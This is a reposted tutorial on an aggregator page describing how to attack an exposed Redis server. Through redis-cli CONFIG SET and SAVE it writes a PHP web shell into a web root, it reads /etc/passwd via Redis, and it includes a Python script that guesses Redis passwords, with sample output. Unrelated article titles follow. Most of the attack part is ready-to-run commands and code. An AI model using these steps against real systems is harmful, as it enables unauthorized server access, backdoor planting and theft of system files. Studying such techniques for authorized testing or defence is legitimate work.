REDIS - Export File / Read File / Cracker
来源:互联网 发布:分布式云计算 编辑:程序博客网 时间:2024/06/02 04:34
Export File
If redis and web service are both on the same server, maybe we can get a shell.
- Connect to redis port (default: 6379).
lab:~/ $ redis-cli -h localhost -p 6379
- Get current configuration
127.0.0.1:6379> CONFIG GET * 1) "dbfilename" 2) "dump.rdb" 3) "requirepass" 4) "" 5) "masterauth" 6) "" 7) "unixsocket" 8) "" 9) "logfile" 10) "" 11) "pidfile" 12) "/var/run/redis_6379.pid" 13) "maxmemory" 14) "3221225472" 15) "maxmemory-samples" 16) "5" 17) "timeout" 18) "0" 19) "tcp-keepalive" 20) "0" 21) "auto-aof-rewrite-percentage" 22) "100" 23) "auto-aof-rewrite-min-size" 24) "67108864" 25) "hash-max-ziplist-entries" 26) "512" 27) "hash-max-ziplist-value" 28) "64" 29) "list-max-ziplist-entries" 30) "512" 31) "list-max-ziplist-value" 32) "64" 33) "set-max-intset-entries" 34) "512" 35) "zset-max-ziplist-entries" 36) "128" 37) "zset-max-ziplist-value" 38) "64" 39) "hll-sparse-max-bytes" 40) "3000" 41) "lua-time-limit" 42) "5000" 43) "slowlog-log-slower-than" 44) "10000" 45) "latency-monitor-threshold" 46) "0" 47) "slowlog-max-len" 48) "128" 49) "port" 50) "6379" 51) "tcp-backlog" 52) "511" 53) "databases" 54) "16" 55) "repl-ping-slave-period" 56) "10" 57) "repl-timeout" 58) "60" 59) "repl-backlog-size" 60) "1048576" 61) "repl-backlog-ttl" 62) "3600" 63) "maxclients" 64) "10000" 65) "watchdog-period" 66) "0" 67) "slave-priority" 68) "100" 69) "min-slaves-to-write" 70) "0" 71) "min-slaves-max-lag" 72) "10" 73) "hz" 74) "10" 75) "cluster-node-timeout" 76) "15000" 77) "cluster-migration-barrier" 78) "1" 79) "cluster-slave-validity-factor" 80) "10" 81) "repl-diskless-sync-delay" 82) "5" 83) "cluster-require-full-coverage" 84) "yes" 85) "no-appendfsync-on-rewrite" 86) "no" 87) "slave-serve-stale-data" 88) "yes" 89) "slave-read-only" 90) "yes" 91) "stop-writes-on-bgsave-error" 92) "yes" 93) "daemonize" 94) "yes" 95) "rdbcompression" 96) "yes" 97) "rdbchecksum" 98) "yes" 99) "activerehashing"100) "yes"101) "repl-disable-tcp-nodelay"102) "no"103) "repl-diskless-sync"104) "no"105) "aof-rewrite-incremental-fsync"106) "yes"107) "aof-load-truncated"108) "yes"109) "appendonly"110) "no"111) "dir"112) "/var/redis/6379"113) "maxmemory-policy"114) "noeviction"115) "appendfsync"116) "everysec"117) "save"118) "900 1 300 10 60 10000"119) "loglevel"120) "notice"121) "client-output-buffer-limit"122) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"123) "unixsocketperm"124) "0"125) "slaveof"126) ""127) "notify-keyspace-events"128) ""129) "bind"130) ""127.0.0.1:6379>
- Export DB File.
During pentesting, we can export a web shell also.
127.0.0.1:6379> CONFIG SET dir /var/www/OK127.0.0.1:6379> CONFIG SET dbfilename backdoor.phpOK127.0.0.1:6379> SET data "<?php phpinfo(); ?>"OK127.0.0.1:6379> SAVEOK127.0.0.1:6379> QUIT
We can view php information here.
root@kali:~# curl -o data.txt http://localhost:8080/backdoor.php % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed100 50181 0 50181 0 0 2219k 0 --:--:-- --:--:-- --:--:-- 2450kroot@kali:~# grep --color -i -n -a phpinfo data.txt 25:<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
- Restore REDIS Configuration
Clear redis operation data, and restore previous configuration.
127.0.0.1:6379> CONFIG SET dbfilename dump.rdbOK127.0.0.1:6379> CONFIG SET dir /var/redis/6379/OK127.0.0.1:6379> KEYS *1) "bar"2) "key"3) "foo"4) "data"127.0.0.1:6379> DEL data(integer) 1127.0.0.1:6379> KEYS *1) "bar"2) "key"3) "foo"127.0.0.1:6379> SAVEOK
Read File
redis-cli -x HSET passwd text </etc/passwdredis-cli --raw HGET passwd text >/tmp/passwd redis-cli DEL passwd
REDIS Cracker
If redis server sets a password, we can crack it with following demo.
#!/usr/bin/env python# -*- coding: utf8 -*-import socketimport logginglogging.basicConfig(level=logging.DEBUG, format="[*] %(funcName)s - %(message)s")logger = logging.getLogger('redis_cracker')BUFSIZE = 1024def crack_redis(host, port, password): logger.debug('cracking resdis %s:%s with %s' % (host, port, password)) # create a socket for redis connection sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ret = sock.connect_ex((host, port)) # failed to make a redis connection if ret != 0: logging.info("failed to connect to redis") return False, None # logger.debug('Check AUTH is enable or not') # send a INFO request sock.send('INFO\r\n') # recv socket resp data = sock.recv(BUFSIZE) if "NOAUTH Authentication required" in data: # crack password sock.send('AUTH %s\r\n' % password) data = sock.recv(BUFSIZE) # auth successfully if "+OK" in data: logging.info("redis pass: [%s]\n" % password) return True, password # auth failed else: logging.debug("%s\n" % data.strip()) else: logging.info("No password protection\n") return True, None return False, Noneif __name__ == "__main__": passwords = ['admin', 'pass', 'password', '123'] host = "localhost" port = 6379 for p in passwords: bool, pwd = crack_redis(host, port, p) if bool: break
Now, we can crack localhost redis server.
root@kali:~# python2 crack_redis.py [*] crack_redis - cracking resdis localhost:6379 with admin[*] crack_redis - -ERR invalid password[*] crack_redis - cracking resdis localhost:6379 with pass[*] crack_redis - -ERR invalid password[*] crack_redis - cracking resdis localhost:6379 with password[*] crack_redis - redis pass: [password]
Redis pass: [password].
root@kali:~# redis-cli -h localhost -p 6379localhost:6379> AUTH passwordOK
Authentication is successful.
References
CN - Trying to hack Redis via HTTP requests
EN - Trying to hack Redis via HTTP requests
0 0
- REDIS - Export File / Read File / Cracker
- File Read
- read file
- Export To File
- EXPORT TO XLSX-FILE
- Read .properties file
- Read .XML file
- db file sequential read
- Read cvs file
- Read Resource File
- Java read file
- read and select file
- J2ME read txt file
- db file sequential read
- ksh read file examples
- Read-only File System
- Perl read INI file
- db file sequential read
- Hibernate配置(配置文件方式)
- 在Android中探秘建造者模式
- NonSpeechDataFilter API
- MapReduce: Simplified Data Processing on Large Clusters 中文翻译 4
- java中的this和super关键字在内存中进行分析
- REDIS - Export File / Read File / Cracker
- 河南第八届acm-C最少换乘 【最短路 建模】
- 《软件调试艺术》读后感六
- AbstractVoiceActivityDetector
- 云安全三大趋势:纵深防御、软件定义安全、设备虚拟化
- Java设计模式之单例与双重锁定
- AsyncTask的缺陷
- c++ 备忘录模式(memento)
- 一点思考